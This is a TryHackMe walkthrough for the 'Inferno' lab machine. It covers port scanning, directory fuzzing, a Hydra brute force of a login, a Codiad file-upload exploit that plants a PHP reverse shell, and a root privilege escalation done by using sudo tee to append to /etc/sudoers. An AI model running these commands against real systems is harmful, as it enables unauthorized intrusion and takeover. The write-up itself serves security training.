Inferno (OSCP practice + tee privesc)

TryHackMe — Inferno Lets Do it!!

Hello guys! Today We are tackling the room Inferno! from the TryHackMe. Without further ado, let’s get started! Enumeration Starts…

we will start with a nmap scan.

export IP=10.10.148.13nmap -sC -sV -T4 -oN nmap.txt $IP

And this this will throw a haunted output, looks like this time we will have more fun++.

21/tcp open ftp? syn-ack ttl 63 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA) | ssh-rsa | 256 de:4f:ee:fa:86:2e:fb:bd:4c:dc:f9:67:73:02:84:34 (ECDSA) | ecdsa-sha2-nistp256 | 256 e2:6d:8d:e1:a8:d0:bd:97:cb:9a:bc:03:c3:f8:d8:85 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdzynTIlsSkYKaqfCAdSx5J2nfdoWFw1FcpKFIF8LRv 23/tcp open telnet? syn-ack ttl 63 25/tcp open smtp? syn-ack ttl 63 |smtp-commands: Couldn't establish connection on port 25 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) | http-methods: | Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Dante's Inferno 88/tcp open kerberos-sec? syn-ack ttl 63 106/tcp open pop3pw? syn-ack ttl 63 110/tcp open pop3? syn-ack ttl 63 389/tcp open ldap? syn-ack ttl 63 443/tcp open https? syn-ack ttl 63 464/tcp open kpasswd5? syn-ack ttl 63 636/tcp open ldapssl? syn-ack ttl 63 777/tcp open multiling-http? syn-ack ttl 63 783/tcp open spamassassin? syn-ack ttl 63 808/tcp open ccproxy-http? syn-ack ttl 63 873/tcp open rsync? syn-ack ttl 63 1001/tcp open webpush? syn-ack ttl 63 1236/tcp open bvcontrol? syn-ack ttl 63 1300/tcp open h323hostcallsc? syn-ack ttl 63 2000/tcp open cisco-sccp? syn-ack ttl 63 2003/tcp open finger? syn-ack ttl 63 |_finger: ERROR: Script execution failed (use -d to debug) 2121/tcp open ccproxy-ftp? syn-ack ttl 63 2601/tcp open zebra? syn-ack ttl 63 2602/tcp open ripd? syn-ack ttl 63 2604/tcp open ospfd? syn-ack ttl 63 2605/tcp open bgpd? syn-ack ttl 63 2607/tcp open connection? syn-ack ttl 63 2608/tcp open wag-service? syn-ack ttl 63 4224/tcp open xtell? syn-ack ttl 63 5051/tcp open ida-agent? syn-ack ttl 63 5432/tcp open postgresql? syn-ack ttl 63 5555/tcp open freeciv? syn-ack ttl 63 5666/tcp open nrpe? syn-ack ttl 63 6346/tcp open gnutella? syn-ack ttl 63 6566/tcp open sane-port? syn-ack ttl 63 6667/tcp open irc? syn-ack ttl 63 |_irc-info: Unable to open connection 8021/tcp open ftp-proxy? syn-ack ttl 63 8081/tcp open blackice-icecap? syn-ack ttl 63 |_mcafee-epo-agent: ePO Agent not found 8088/tcp open radan-http? syn-ack ttl 63 9418/tcp open git? syn-ack ttl 63 10000/tcp open snet-sensor-mgmt? syn-ack ttl 63 10082/tcp open amandaidx? syn-ack ttl 63 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Now Note, Here we see question marks on many port that means nmap does not know what these port actually doing, in other words nmap isn’t sure about the service. Lets start out with the web. Port 80 HTTP :

So this is the Index page’s look. This contains some Latin strings, a traditional style image and the page source is also useless. — Move ON!! — the index page’s look.

Let’s start Directories and Files Discovery. I used the following commands:

#For Directories : ffuf -c -u http://10.10.148.13/FUZZ/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt# For Files : ffuf -c -u http://10.10.148.13/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt

But this gives nothing, then I thought we need to “Try-Harder” Lets try some bigger wordlists. So I used the following one :

ffuf -c -u http://10.10.148.13/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

and $ — — Bling Bling — — $ we got something : Cool!! we got /inferno/

we got a directory named /inferno/. So lets visit to this directory and see what is roaming there. ohh no!!!

😣Ohh!! this requires credentials …. we need admin creds?? Lets find-out that shit now!!😤😤

I tried some common creds like [admin:admin, admin:password, root:root, root:toor] and some more like that…but we got 👎👎👎.

So use Hydra the Dragon now and burnout🔥🔥 this login form.

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.148.13 http-get /inferno -t 64

this gives us the user:password

Now we have creds- Supply the creds and Get in….

But we need to login again, I used same creds and this worked!!👍👍 we are totally in now.

Now we are finally inside the admin panel. Here I noticed something…. Did you ???🤨🤨🤨

If we see this website’s title is “Codiad” . oh yes

I have already exploited this service earlier. lets use searchsploit to find any offline exploit available for this on our system.

searchsploit codiad

AHHHAA!! this is the we …

Ohuuuhhaa!! this is the thing we are looking for!! I am going to use last one so lets copy this to present working directory.

searchsploit -m multiple/webapps/50474.txt

After reading the exploit I clearly understand that this site is vulnerable to a “file-upload” Vulnerability. So lets abuse this weakness and have target system shell🐚🐚.

As recommended Lets visit to the /inferno/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/.

here right click the /INF/directory and click on upload files option.

Now click on “Drag Files Or Click Here To Upload” and upload your reverse shell …

I used php-reverse-shell.php by pentest-monkey. reverse shell editing

you can find here.📌📌📌

Now set-up a listner👂 and lets provoke the reverse shell. To Do this simpply visit the reverse-shell’e location.

and we will get a reverse connection on our listener👂.

Now Its Time to Enumerate more and find the way to root. I started with the user dante’s home Directory. and found something which comesout wiered to me: In the /home/dante/Downloads/ Directory.

drwxr-xr-x 2 root root 4096 Jan 11 15:29 . drwxr-xr-x 13 dante dante 4096 Jan 11 15:46 .. -rw-r--r-- 1 root root 1511 Nov 3 11:52 .download.dat <<<<<-- -rwxr-xr-x 1 root root 137440 Jan 11 15:29 CantoI.docx -rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoII.docx -rwxr-xr-x 1 root root 88280 Jan 11 15:29 CantoIII.docx -rwxr-xr-x 1 root root 63704 Jan 11 15:29 CantoIV.docx -rwxr-xr-x 1 root root 133792 Jan 11 15:29 CantoIX.docx -rwxr-xr-x 1 root root 43224 Jan 11 15:22 CantoV.docx -rwxr-xr-x 1 root root 133792 Jan 11 15:29 CantoVI.docx -rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoVII.docx -rwxr-xr-x 1 root root 63704 Jan 11 15:29 CantoX.docx -rwxr-xr-x 1 root root 121432 Jan 11 15:29 CantoXI.docx -rwxr-xr-x 1 root root 149080 Jan 11 15:22 CantoXII.docx -rwxr-xr-x 1 root root 216256 Jan 11 15:22 CantoXIII.docx -rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoXIV.docx -rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoXIX.docx -rwxr-xr-x 1 root root 88280 Jan 11 15:29 CantoXV.docx -rwxr-xr-x 1 root root 137440 Jan 11 15:29 CantoXVI.docx -rwxr-xr-x 1 root root 121432 Jan 11 15:29 CantoXVII.docx -rwxr-xr-x 1 root root 2351792 Jan 11 15:22 CantoXVIII.docx -rwxr-xr-x 1 root root 63704 Jan 11 15:29 CantoXX.docx

note the .download.dat file. If you cat it out simply this will give some encoded HEX strings.

So lets Decode it and see where this encoded data ends :

Boom!!💥💥 we got Dante’s creds. Lets use SSH and get inside this system with a nice TTY.

Whenever we have a real user the first thing we should check is the SUDO Rights. So lets check this now::: I used Dr.GTFOBINS for this operation. this is the End!!

Here we can run TEE as root with nopassword. So lets Abuse it ::

File=/etc/sudoers

echo "dante ALL=(ALL:ALL) ALL" | sudo tee -a "$File"

sudo -l

sudo sh

PreviousMustacchio (XXE Vulnerability + tail privesc)NextJurrasic (SQL Injection)

Last updated